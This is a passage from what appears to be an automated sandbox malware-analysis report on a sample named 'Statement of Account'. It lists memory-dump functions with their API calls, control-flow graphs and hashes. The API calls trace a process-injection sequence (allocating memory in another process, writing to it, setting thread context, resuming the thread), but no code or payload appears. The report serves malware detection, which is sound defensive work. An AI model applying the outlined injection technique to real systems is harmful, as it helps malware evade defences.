                                                                                                                                                  • Opcode Fuzzy Hash: 52732b37884682d00721f9ea248ec7925d78929e0d1522d05a00cf6026cf2180
                                                                                                                                                  • Instruction Fuzzy Hash: 1841B2B0C0071DCBDB24DFAAC884B9EBBF5BF49314F20806AD509AB251DB756949CF90
                                                                                                                                                  Function 013F590C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 858 13f590c-13f5912 859 13f591c-13f59d9 CreateActCtxA 858->859 861 13f59db-13f59e1 859->861 862 13f59e2-13f5a3c 859->862 861->862 869 13f5a3e-13f5a41 862->869 870 13f5a4b-13f5a4f 862->870 869->870 871 13f5a51-13f5a5d 870->871 872 13f5a60 870->872 871->872 874 13f5a61 872->874 874->874
                                                                                                                                                  APIs
                                                                                                                                                  • CreateActCtxA.KERNEL32(?), ref: 013F59C9
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1729675977.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_13f0000_Statement of Account.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Create
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2289755597-0
                                                                                                                                                  • Opcode ID: 15a54938c32be69b250f14913eb071dac2e1a0c6094c4ea89fffa4ef54e26341
                                                                                                                                                  • Instruction ID: 5ae26cd866188b5f8ab5b466d37463d9367f83576a64d906d469b7288c311dbd
                                                                                                                                                  • Opcode Fuzzy Hash: 15a54938c32be69b250f14913eb071dac2e1a0c6094c4ea89fffa4ef54e26341
                                                                                                                                                  • Instruction Fuzzy Hash: 8F4114B0C0071ECBDB25CFA9C88478DBBF5BF49314F20815AC509AB291DB75694ACF50
                                                                                                                                                  Function 07A34A11 Relevance: 1.6, APIs: 1, Instructions: 92injectionCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 875 7a34a11-7a34a14 876 7a349e6-7a349e7 875->876 877 7a34a16-7a34a66 875->877 879 7a349e9-7a349f1 876->879 880 7a349f8 876->880 884 7a34a76-7a34a7f 877->884 885 7a34a68-7a34a74 877->885 879->880 881 7a34a06-7a34a10 880->881 882 7a349fa-7a34a01 880->882 881->875 886 7a34a86-7a34ab5 WriteProcessMemory 884->886 885->884 887 7a34ab7-7a34abd 886->887 888 7a34abe-7a34aee 886->888 887->888
                                                                                                                                                  APIs
                                                                                                                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07A34AA8
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1735163219.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_7a30000_Statement of Account.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MemoryProcessWrite
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3559483778-0
                                                                                                                                                  • Opcode ID: a0ec26f66b87c4f6ad628beef1b60ed0ec750e233deb3d273a0437f27516cde1
                                                                                                                                                  • Instruction ID: ce8bbc020920b719f683d387a0d5088a587659d61ad40a4191112ddfa56bf470
                                                                                                                                                  • Opcode Fuzzy Hash: a0ec26f66b87c4f6ad628beef1b60ed0ec750e233deb3d273a0437f27516cde1
                                                                                                                                                  • Instruction Fuzzy Hash: 04319CB69003499FCB14CFA9C984BEEFFF1EF48310F50842AE968A7251C3349954CBA0
                                                                                                                                                  Function 078117B0 Relevance: 1.6, APIs: 1, Instructions: 85windowCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 892 78117b0-78117c2 893 78117ca-78117d5 892->893 902 78117c5 call 78117a0 892->902 903 78117c5 call 78117b0 892->903 894 78117d7-78117e7 893->894 895 78117ea-781187c CreateIconFromResourceEx 893->895 898 7811885-78118a2 895->898 899 781187e-7811884 895->899 899->898 902->893 903->893
                                                                                                                                                  APIs
                                                                                                                                                  • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 0781186F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1734347846.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_7810000_Statement of Account.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateFromIconResource
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3668623891-0
                                                                                                                                                  • Opcode ID: dcaaa6b578d40922bbc2e95aecd3e1c919782a9ece0895a142b28c89658b6d04
                                                                                                                                                  • Instruction ID: 41f76ed0ce31024053f44c8ac1c51d64909ab9b05bdec5c4e2c208342e05127c
                                                                                                                                                  • Opcode Fuzzy Hash: dcaaa6b578d40922bbc2e95aecd3e1c919782a9ece0895a142b28c89658b6d04
                                                                                                                                                  • Instruction Fuzzy Hash: 59319CB59013889FCB11CFA9C804AEEBFF8EF09310F14805AE954EB261C3359854DFA1
                                                                                                                                                  Function 07A34A18 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 904 7a34a18-7a34a66 906 7a34a76-7a34ab5 WriteProcessMemory 904->906 907 7a34a68-7a34a74 904->907 909 7a34ab7-7a34abd 906->909 910 7a34abe-7a34aee 906->910 907->906 909->910
                                                                                                                                                  APIs
                                                                                                                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07A34AA8
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1735163219.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_7a30000_Statement of Account.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MemoryProcessWrite
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3559483778-0
                                                                                                                                                  • Opcode ID: 47b8bc46de270a02935d1c9d4faecca3c1d503a64a472b6148a9502a9b255600
                                                                                                                                                  • Instruction ID: a2582c6ebe3bcc6aaa259228190e30f61a7a2c36383b5e08ddf75106c836df2e
                                                                                                                                                  • Opcode Fuzzy Hash: 47b8bc46de270a02935d1c9d4faecca3c1d503a64a472b6148a9502a9b255600
                                                                                                                                                  • Instruction Fuzzy Hash: 5E2139B5D003599FCB10DFA9C885BEEBBF5FF88310F508429E929A7240C7789944CBA4
                                                                                                                                                  Function 07A34440 Relevance: 1.6, APIs: 1, Instructions: 68threadCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07A344C6
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1735163219.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_7a30000_Statement of Account.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ContextThreadWow64
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 983334009-0
                                                                                                                                                  • Opcode ID: bc51012a01e68cc68eb021296dfa68ffb109e0921c8a6c2d5c5fe41dc8648ac7
                                                                                                                                                  • Instruction ID: 9128acd921e435b732678babebf3f3874498d053b0f0345e8888a4be7d304f06
                                                                                                                                                  • Opcode Fuzzy Hash: bc51012a01e68cc68eb021296dfa68ffb109e0921c8a6c2d5c5fe41dc8648ac7
                                                                                                                                                  • Instruction Fuzzy Hash: B22159B19003499FDB10DFAAC4857EEBBF4EF88320F548429D459A7241DB78A945CFA1
                                                                                                                                                  Function 07A34B00 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07A34B88
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1735163219.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_7a30000_Statement of Account.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MemoryProcessRead
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1726664587-0
                                                                                                                                                  • Opcode ID: a2a9627d0cebff71c07bb38bc4bdf8f871121819812ab9a4332165777b32bfcf
                                                                                                                                                  • Instruction ID: 676bf7e0166dc9e76b86ccceebc9d9f9b48d90b9674906268ed36ec347ca8826
                                                                                                                                                  • Opcode Fuzzy Hash: a2a9627d0cebff71c07bb38bc4bdf8f871121819812ab9a4332165777b32bfcf
                                                                                                                                                  • Instruction Fuzzy Hash: 6C2139B58003599FCB10DFAAC881AEEFBF5FF48320F50842AE959A7240C7349945DFA1
                                                                                                                                                  Function 013FD699 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 013FD727
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1729675977.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_13f0000_Statement of Account.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: DuplicateHandle
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3793708945-0
                                                                                                                                                  • Opcode ID: f87379fad9af71e573eb0ae760345106c93efb8330b0e9ac707b77e1996a29aa
                                                                                                                                                  • Instruction ID: 6e3fc398fa00370811573edbd6c9660a71ef992fbdd0cfcade81f8c8da048ee3
                                                                                                                                                  • Opcode Fuzzy Hash: f87379fad9af71e573eb0ae760345106c93efb8330b0e9ac707b77e1996a29aa
                                                                                                                                                  • Instruction Fuzzy Hash: 5021E3B59002489FDB10CFAAD485AEEBFF5EB48314F14802AE958A7251C374A945CF60
                                                                                                                                                  Function 07A34448 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07A344C6
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1735163219.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_7a30000_Statement of Account.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ContextThreadWow64
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 983334009-0
                                                                                                                                                  • Opcode ID: 52915815876885d3cd98fb677205170badd6c6af48b88fa5fb7023d4681289b8
                                                                                                                                                  • Instruction ID: 8d4fbe55efd98a4ece761571df2c5776530e810add5929bbec8783e89cea65e5
                                                                                                                                                  • Opcode Fuzzy Hash: 52915815876885d3cd98fb677205170badd6c6af48b88fa5fb7023d4681289b8
                                                                                                                                                  • Instruction Fuzzy Hash: B02149B1D003099FDB10DFAAC4857EEBBF4EF88320F548429D459A7241DB78A945CFA5
                                                                                                                                                  Function 07A34B08 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07A34B88
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1735163219.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_7a30000_Statement of Account.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MemoryProcessRead
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1726664587-0
                                                                                                                                                  • Opcode ID: b00d030e5708f560f86211807775ed4ed835c69e12390f2fbb582262ace769f6
                                                                                                                                                  • Instruction ID: aa7a2368e3efa20470dad05b271f6979e01ac61c2a8bd6359811b03cfa1c6a9d
                                                                                                                                                  • Opcode Fuzzy Hash: b00d030e5708f560f86211807775ed4ed835c69e12390f2fbb582262ace769f6
                                                                                                                                                  • Instruction Fuzzy Hash: C02139B18003599FDB10DFAAC845AEEFBF5FF48320F508429E919A7240C7389945DBA5
                                                                                                                                                  Function 013FD6A0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 013FD727
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1729675977.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_13f0000_Statement of Account.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: DuplicateHandle
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3793708945-0
                                                                                                                                                  • Opcode ID: df44d2d1022d0b69e102ad339acc5cbf2c4fcfd3d65e134382ad2c3bc7abc1ea
                                                                                                                                                  • Instruction ID: 921a65f53a53f40b4092b5fa21fc9ac12afba3ef8ff6377e4373329d7e12e1b6
                                                                                                                                                  • Opcode Fuzzy Hash: df44d2d1022d0b69e102ad339acc5cbf2c4fcfd3d65e134382ad2c3bc7abc1ea
                                                                                                                                                  • Instruction Fuzzy Hash: 6C21C4B59003489FDB10CF9AD984ADEBFF5EB48310F14841AE958A7350D374A954CF65
                                                                                                                                                  Function 07A34956 Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07A349C6
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1735163219.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_7a30000_Statement of Account.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                  • Opcode ID: c043b5eef5f86219048c042910b6b866d97562cc13b04c93ef618df9f83646d6
                                                                                                                                                  • Instruction ID: 88a59cbcde83cc91ea079695a76c7092b451410021962e6e0820e0d640405fe3
                                                                                                                                                  • Opcode Fuzzy Hash: c043b5eef5f86219048c042910b6b866d97562cc13b04c93ef618df9f83646d6
                                                                                                                                                  • Instruction Fuzzy Hash: 671159B58003499FCB10DFAAC844AEFBFF5EF88320F248419E559A7250C735A950CFA0
                                                                                                                                                  Function 07A34390 Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1735163219.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_7a30000_Statement of Account.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ResumeThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 947044025-0
                                                                                                                                                  • Opcode ID: f46c35ca2fe7fe9a62fbeaed773e259b17d07ba30d2c6ab7d488134766fa18f9
                                                                                                                                                  • Instruction ID: 4e8ed3c2e40769c18e649e18edc82a0eb883a966c888adc5dffaf74f4a8ab4aa
                                                                                                                                                  • Opcode Fuzzy Hash: f46c35ca2fe7fe9a62fbeaed773e259b17d07ba30d2c6ab7d488134766fa18f9
                                                                                                                                                  • Instruction Fuzzy Hash: 631167B59002498FCB10DFAAC4447EEFBF4EF88324F208419D459A7240C734A945CBA4
                                                                                                                                                  Function 07A34958 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07A349C6
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1735163219.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_7a30000_Statement of Account.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                  • Opcode ID: 852d2aedb8d05302563c761c848842fafe5dceadb01d14bdf796986f7f004ec1
                                                                                                                                                  • Instruction ID: 72306a3bbe19ee96967ef27db7ec08838d78637791da1265f9a3bef6010a45f1
                                                                                                                                                  • Opcode Fuzzy Hash: 852d2aedb8d05302563c761c848842fafe5dceadb01d14bdf796986f7f004ec1
                                                                                                                                                  • Instruction Fuzzy Hash: B51167B18003499FCB10DFAAC844AEFBFF5EF88320F208819E519A7250C735A940CFA0
                                                                                                                                                  Function 07A34398 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1735163219.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_7a30000_Statement of Account.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ResumeThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 947044025-0
                                                                                                                                                  • Opcode ID: d5684bbf8cbea2043324df857a1001d5cf836ec777d1a7302090764ed67812d4
                                                                                                                                                  • Instruction ID: 0b9835f2549943c08ea0c454e9969b38217de5c7b9d8874c68909c62a1c2ee96
                                                                                                                                                  • Opcode Fuzzy Hash: d5684bbf8cbea2043324df857a1001d5cf836ec777d1a7302090764ed67812d4
                                                                                                                                                  • Instruction Fuzzy Hash: FF113AB19003498FDB24DFAAC4457EFFBF5EF88324F248419D519A7240CB79A944CB95
                                                                                                                                                  Function 07A38BF8 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 07A38C5D
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1735163219.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_7a30000_Statement of Account.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessagePost
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 410705778-0
                                                                                                                                                  • Opcode ID: 1bbbc6ca5318c27cd098da74c65d9e64ecd9db16a2aaa1de52444cb6c1fdf79f
                                                                                                                                                  • Instruction ID: 7c27a447596d3d2570cb150ab15ec144e75ddd489ceb7ee9fa04e79c306c21e7
                                                                                                                                                  • Opcode Fuzzy Hash: 1bbbc6ca5318c27cd098da74c65d9e64ecd9db16a2aaa1de52444cb6c1fdf79f
                                                                                                                                                  • Instruction Fuzzy Hash: 5211F8B58003499FDB10DF99C485BDEFBF4EF48310F208419E558A7240D379A544CFA1
                                                                                                                                                  Function 013FAFB8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 013FB01E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1729675977.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_13f0000_Statement of Account.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: HandleModule
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4139908857-0
                                                                                                                                                  • Opcode ID: 3a48257f510e58cb4f62c278396d854640af1a33af95061c7663c226761a79bc
                                                                                                                                                  • Instruction ID: afe93519e2eef492a3316f9e7fb59ad253b5fbb754028e144d5f914f83ec105c
                                                                                                                                                  • Opcode Fuzzy Hash: 3a48257f510e58cb4f62c278396d854640af1a33af95061c7663c226761a79bc
                                                                                                                                                  • Instruction Fuzzy Hash: 77110FB5C003498FDB24CF9AC444A9EFBF4AB88324F10842AD929A7210D379A545CFA5
                                                                                                                                                  Function 07A332D0 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 07A38C5D
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1735163219.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_7a30000_Statement of Account.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessagePost
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 410705778-0
                                                                                                                                                  • Opcode ID: 808d3e78a758da0aec04ef68fb7665127bd13287476f6cd4f69e4a574674e2f6
                                                                                                                                                  • Instruction ID: eff57ca463becb6514f66d5312072d0539f7895b08892990901fff42f29f4289
                                                                                                                                                  • Opcode Fuzzy Hash: 808d3e78a758da0aec04ef68fb7665127bd13287476f6cd4f69e4a574674e2f6
                                                                                                                                                  • Instruction Fuzzy Hash: B5110AB58003499FDB10DF99C545BDEFBF8EB48310F108419E518A7241C379A944CFA5
                                                                                                                                                  Function 0138D3D8 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1729439593.000000000138D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0138D000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_138d000_Statement of Account.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 4899895b49fc9ef9d622cfdf72056805fdfd09550bb2465b5edc11123e87ed33
                                                                                                                                                  • Instruction ID: e8b5bb61ccb0c8748eb56fce8f76ea7401d6b1d852428a02cdfaa43f29859a6b
                                                                                                                                                  • Opcode Fuzzy Hash: 4899895b49fc9ef9d622cfdf72056805fdfd09550bb2465b5edc11123e87ed33
                                                                                                                                                  • Instruction Fuzzy Hash: 072148B1504304DFDB01EF58D9C0B56BF65FB94328F20C56CD90A1B296C736E416C7A1
                                                                                                                                                  Function 0138D4C4 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1729439593.000000000138D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0138D000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_138d000_Statement of Account.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 6a489e7c4e71b72ce973605d0158c74a85c7e7782386114b25a13368146e4752
                                                                                                                                                  • Instruction ID: 7563717675db1510b550f3285c3154f1fda7970405b2176985e0f22de878ce27
                                                                                                                                                  • Opcode Fuzzy Hash: 6a489e7c4e71b72ce973605d0158c74a85c7e7782386114b25a13368146e4752
                                                                                                                                                  • Instruction Fuzzy Hash: B721F1B1504344EFDB05EF58D9C0B26BF65FB88328F24C56AE90A0B696C336D416CAB1
                                                                                                                                                  Function 0139D01C Relevance: .1, Instructions: 72COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1729492375.000000000139D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0139D000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_139d000_Statement of Account.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 92c530ae9c8984d18ad1064a92e21026b61d4f2529c812090aa8addff9d1b1cb
                                                                                                                                                  • Instruction ID: 18a8bfb844812836e36c2700f7fbf1badd01dd081c149e0d095022b351ced498
                                                                                                                                                  • Opcode Fuzzy Hash: 92c530ae9c8984d18ad1064a92e21026b61d4f2529c812090aa8addff9d1b1cb
                                                                                                                                                  • Instruction Fuzzy Hash: 35210071604204DFDF15DF68D885B26BBA5FB84358F20CA6DD80A0B386C33AD807CA61
                                                                                                                                                  Function 0139D1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1729492375.000000000139D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0139D000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_139d000_Statement of Account.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: cfb581740620567a8f65e2e9ebf274069c23f343b24d59295cc087671c7d87d4
                                                                                                                                                  • Instruction ID: 0318d7a08b52e9be394970cfdad86ff97a777ed7afbbb2eb50f7edd136c13a2a
                                                                                                                                                  • Opcode Fuzzy Hash: cfb581740620567a8f65e2e9ebf274069c23f343b24d59295cc087671c7d87d4
                                                                                                                                                  • Instruction Fuzzy Hash: 6C21F5B5604204EFDF05DF98D9C5B25BBA5FB84328F24C6ADD94A4B392C336D406CA61
                                                                                                                                                  Function 0138D4BF Relevance: .1, Instructions: 56COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1729439593.000000000138D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0138D000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_138d000_Statement of Account.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                                                                                                                                  • Instruction ID: 11189ade2e4f0a57d3bd42ba8ccaa8d7a9e0d9e80243021cac5285dae29800e4
                                                                                                                                                  • Opcode Fuzzy Hash: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                                                                                                                                  • Instruction Fuzzy Hash: 4E11E176504380CFCB02DF54D5C4B16BF72FB84328F24C6AAD8090B696C336D45ACBA1
                                                                                                                                                  Function 0138D3D3 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1729439593.000000000138D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0138D000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_138d000_Statement of Account.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                                                                                                                                  • Instruction ID: dc7bf70595c95c456f849d93ad547c85f32cab151a5260809b8cebc97143736d
                                                                                                                                                  • Opcode Fuzzy Hash: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
